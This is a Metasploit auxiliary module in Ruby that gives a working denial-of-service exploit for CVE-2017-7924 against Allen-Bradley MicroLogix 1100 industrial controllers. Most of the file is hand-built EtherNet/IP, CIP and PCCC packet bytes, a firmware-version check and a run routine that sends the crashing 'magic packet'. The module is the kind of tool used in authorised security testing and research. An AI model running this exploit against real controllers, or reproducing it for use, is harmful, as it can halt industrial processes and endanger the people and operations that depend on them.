Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Udp
8
  include Msf::Exploit::Remote::Tcp
9
  include Msf::Auxiliary::Dos
10

11
  def initialize(info = {})
12
    super(
13
      'Name'           => "DoS Exploitation of Allen-Bradley's Legacy Protocol (PCCC)",
14
      'Description'    => %q{
15
        A remote, unauthenticated attacker could send a single, specially crafted
16
        Programmable Controller Communication Commands (PCCC) packet to the controller
17
        that could potentially cause the controller to enter a DoS condition.
18
        MicroLogix 1100 controllers are affected: 1763-L16BWA, 1763-L16AWA, 1763-L16BBB, and
19
        1763-L16DWD.
20
        CVE-2017-7924 has been assigned to this vulnerability.
21
        A CVSS v3 base score of 7.5 has been assigned.
22
      },
23
        'Author'         => [
24
          'José Diogo Monteiro <jdlopes[at]student.dei.uc.pt>',
25
          'Luis Rosa <lmrosa[at]dei.uc.pt>',
26
          'Miguel Borges de Freitas <miguelbf[at]dei.uc.pt>'
27
      ],
28
      'License'        => MSF_LICENSE,
29
      'References'     =>
30
      [
31
        [ 'CVE', '2017-7924' ],
32
        [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-17-138-03' ],
33
        [ 'URL', 'https://dl.acm.org/doi/10.1145/3174776.3174780']
34
      ])
35
      register_options([Opt::RPORT(44818),])
36
  end
37

38
  VULN_LIST = ['1763-L16BWA','1763-L16AWA','1763-L16BBB','1763-L16DWD']
39
  VULN_FW_VERSION_MIN = 14.00
40
  VULN_FW_VERSION_MAX = 16.00
41
  def le_pp(s)
42
    "0x#{Rex::Text.to_hex(s, prefix="").scan(/../).reverse.join("")}"
43
  end
44

45
  def enip_register_session_pkt
46
    # ENIP encapsulation Header
47
    "\x65\x00" + # Command register session (0x0065)
48
    "\x04\x00" + # Length (4)
49
    "\x00\x00\x00\x00" + # Session handle (0x00000000)
50
    "\x00\x00\x00\x00" + # Status success (0x00000000)
51
    "\x00\x00\x00\x00\x00\x00\x00\x00" + # Sender context (0x0000000000000000)
52
    "\x00\x00\x00\x00" + # Options (0x00000000)
53
    # Protocol Specific Data
54
    "\x01\x00" + # Protocol version (1)
55
    "\x00\x00" # Option flags (0x00000000)
56
  end
57

58
  def enip_ccm_forward_open_pkt(enip_session_handle)
59
    # ENIP encapsulation header
60
    "\x6f\x00" + # Send RR data (0x006f)
61
    "\x3e\x00" + # Length (63)
62
    enip_session_handle + # Session handle (retrieved from register session)
63
    "\x00\x00\x00\x00" + # Status success (0x00000000)
64
    "\x00\x00\x00\x00\x00\x00\x00\x00" + # Sender context (0x0000000000000000)
65
    "\x00\x00\x00\x00" + # Options (0x00000000)
66
    # Command specific data
67
    "\x00\x00\x00\x00" + # Interface handle (CIP = 0x00000000)
68
    "\x00\x00" + # Timeout (0)
69
    "\x02\x00" + # Item count (2)
70
    "\x00\x00" + # Item 1 type id (Null address item)
71
    "\x00\x00" + # Item 1 length (0)
72
    "\xb2\x00" + # Item 2 type id (Unconnected data item)
73
    "\x2e\x00" + # Item 2 length (46)
74
    # CIP Connection manager specific data
75
    "\x54\x02\x20\x06\x24\x01\x0a\xf0" +
76
    "\x00\x00\x00\x00\x52\xac\xda\x89" +
77
    "\x55\x0c\x35\x01\xe1\x08\xb0\x60" +
78
    "\x07\x00\x00\x00\x00\x40\x00\x00" +
79
    "\x12\x43\x00\x40\x00\x00\x12\x43" +
80
    "\xa3\x02\x20\x02\x24\x01"
81
  end
82

83
  # Any combination of File Number 0x02–0x08 and File Type 0x48 or 0x47 will trigger a Major Error (0x08)
84
  def pccc_dos_pkt(enip_session_id, cip_connection_id)
85
    # ENIP encapsulation header
86
    "\x70\x00" + # Send unit data (0x0070)
87
    "\x2d\x00" + # Length
88
    enip_session_id + # ENIP session handle (obtained from enip register session)
89
    "\x00\x00\x00\x00" + # Status Success
90
    "\x00\x00\x00\x00\x00\x00\x00\x00" + # Sender context
91
    "\x00\x00\x00\x00" + # Options
92
    # Command Specific data
93
    "\x00\x00\x00\x00" + # Interface handle (CIP)
94
    "\x00\x00" + # Timeout (0)
95
    "\x02\x00" + # Item count
96
    "\xa1\x00" + # Item 1 - Type ID (Connected address item)
97
    "\x04\x00" + # Item 1 - Length (4)
98
    cip_connection_id + # CIP connection ID (obtained from CIP CM packet)
99
    "\xb1\x00" + # Item 2 - Type ID (Connected data item)
100
    "\x19\x00" + # Item 2 - Length (25)
101
    "\x01\x00" + # Item 2 - CIP Sequence Count (1) - first packet
102
    # PCCC Command data
103
    "\x4b" + # Execute PCCC (0x4b)
104
    "\x02\x20\x67\x24\x01" + # no idea what this is
105
    "\x07" + # Requestor ID length
106
    "\x35\x01" + # CIP vendor ID
107
    "\xe1\x08\xb0\x60" + # CIP serial number
108
    "\x0f" + # Command code
109
    "\x00" + # Status (success 0x00)
110
    "\x2a\x58" + # Transaction code
111
    "\xa2" + # Function code (Protected typed logical read with three address fields)
112
    "\x00" + # Byte size
113
    "\x05" + # File number
114
    "\x47" + # File type
115
    "\x00" + # Element number
116
    "\x00" # Sub-element number
117
  end
118

119
  def enip_list_identify_pkt
120
    "\x63\x00" + # List Identity
121
    "\x00\x00" + # Length
122
    "\x00\x00\x00\x00" + # Session Handle
123
    "\x00\x00\x00\x00" + # Status: Success
124
    "\x00\x00" + # Max Response Delay
125
    "\x00\x00\xc1\xde\xbe\xd1" + # Sender Context
126
    "\x00\x00\x00\x00" # Options
127
  end
128

129

130
  def check
131

132
    connect_udp
133

134
    udp_sock.put(enip_list_identify_pkt)
135
    res = udp_sock.recvfrom(90)
136

137
    disconnect_udp
138

139
    unless res && res[0].length > 63 && res[0][0,2] == "\x63\x00"
140
      print_error "EtherNet/IP Packet Not Valid"
141
      return Exploit::CheckCode::Unsupported
142
    end
143

144
    revision = res[0][54,2]
145
    product_name_len = res[0][62].unpack("c*")[0]
146

147

148
    product_name = res[0][63,product_name_len]
149
    print_status "Product Name: #{product_name}"
150

151
    array = product_name.split(' ')
152
    plc_model = array[0]
153

154
    return Exploit::CheckCode::Safe unless VULN_LIST.any? { |e| plc_model.include? e }
155

156
    firmware = array[1]
157
    begin
158
      firmware_nbr = firmware.scan(/(\d+[.,]\d+)/).flatten.first.to_f
159
      if firmware_nbr >= VULN_FW_VERSION_MIN && firmware_nbr < VULN_FW_VERSION_MAX
160
        return Exploit::CheckCode::Vulnerable
161
      elsif firmware_nbr < VULN_FW_VERSION_MIN
162
        return Exploit::CheckCode::Appears
163
      else
164
        return Exploit::CheckCode::Safe
165
      end
166
    rescue
167
      return Exploit::CheckCode::Unknown
168
    end
169

170
  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
171
    elog(e)
172
  ensure
173
    disconnect
174
  end
175

176
  def run
177
    connect
178
    # Register Ethernet/IP session
179
    sock.put(enip_register_session_pkt)
180
    enip_register_session_ans = sock.get_once
181
    unless enip_register_session_ans && enip_register_session_ans.length == 28 && enip_register_session_ans[0,2] == "\x65\x00"
182
      print_error "Ethernet/IP - Failed to create session."
183
      disconnect
184
      return
185
    end
186
    enip_session_id = enip_register_session_ans[4, 4]
187
    print_status "Ethernet/IP - Session created (id #{le_pp(enip_session_id)})"
188

189
    # Ethernet/IP CCM Forward Open
190
    sock.put(enip_ccm_forward_open_pkt(enip_session_id))
191
    enip_ccm_forward_open_ans = sock.get_once
192
    unless enip_ccm_forward_open_ans && enip_ccm_forward_open_ans.length > 48 && enip_ccm_forward_open_ans[0,2] == "\x6f\x00"
193
      print_error "CIP Connection Manager - Failed Forward Open request"
194
      disconnect
195
      return
196
    end
197
    cip_connection_id = enip_ccm_forward_open_ans[44, 4]
198
    print_status "CIP Connection Manager - Forward Open Success (Connection id #{le_pp(cip_connection_id)})"
199

200
    # PCCC DoS packet
201
    print_status "Sending PCCC DoS magic packet..."
202
    sock.put(pccc_dos_pkt(enip_session_id, cip_connection_id))
203

204
  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
205
    elog(e)
206
  ensure
207
    disconnect
208
  end
209
end
210

211